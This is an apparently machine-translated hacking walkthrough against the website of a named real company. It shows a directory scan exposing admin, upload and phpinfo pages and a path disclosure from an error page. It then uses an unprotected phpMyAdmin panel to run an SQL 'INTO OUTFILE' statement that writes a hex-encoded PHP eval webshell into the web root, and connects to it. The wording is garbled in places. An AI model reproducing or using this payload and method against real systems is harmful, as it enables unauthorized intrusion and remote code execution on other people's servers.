Daniel laughed. In fact, this is luck.
Target website www.tcl.com
Website Structure
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9
Mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
The scan result is as follows:
Http://www.tcl.com: 80/% 23sql. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/% 23sql. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/% 23sql. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/aHTTP/1.1 200 OK
Http://www.tcl.com: 80/cgi-bin/HTTP/1.1 403 Forbidden
Http://www.tcl.com: 80/index. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/main/HTTP/1.1 403 Forbidden
Http://www.tcl.com: 80/NewsHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/HTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/HTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/newslogin.htm. HTTP/1.1 200 OK
Http://www.tcl.com: 80/phpinfo. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/upload. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/upload. php? Action = upfileHTTP/1.1 200 OK
Http://www.tcl.com: 80/phpinfo. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/wenzhang. mdbHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/HTTP/1.1 200 OK
Http://www.tcl.com: 80/phpmyadmin/HTTP/1.1 200 OK
There are still many issues that will not be sent
Access http://www.tcl.com: 80/newslogin.htm.
Directly expose the path
Fatal error: Cannot instantiate abstract class Action in/opt/lampp/htdocs/tcl/Front/Runtime /~ Runtime. php on line 2
Now let's take a look at this http://www.tcl.com: 80/phpmyadmin/
Try to access
This SB vulnerability exists in the background of phpmyadmin without having to use any account or password. If you really don't understand the tcl website, the website protection staff will have this vulnerability.
After logging on to the phpmyadmin background, didn't we get the absolute path strength?
Write a sentence using SQL
Click SQL
Select 0x3C3F706870206576616C28245F504F53545B636D645D293F3E into outfile/opt/lampp/htdocs/tcl/2b. php;
Access www.tcl.com/2b.php and use the client to connect to www.tcl.com/2b.php.
The displayed blank indicates that the data is successfully inserted and connected to the client.
The next thing to win is to pass the webshell, and I will not take a txt flash.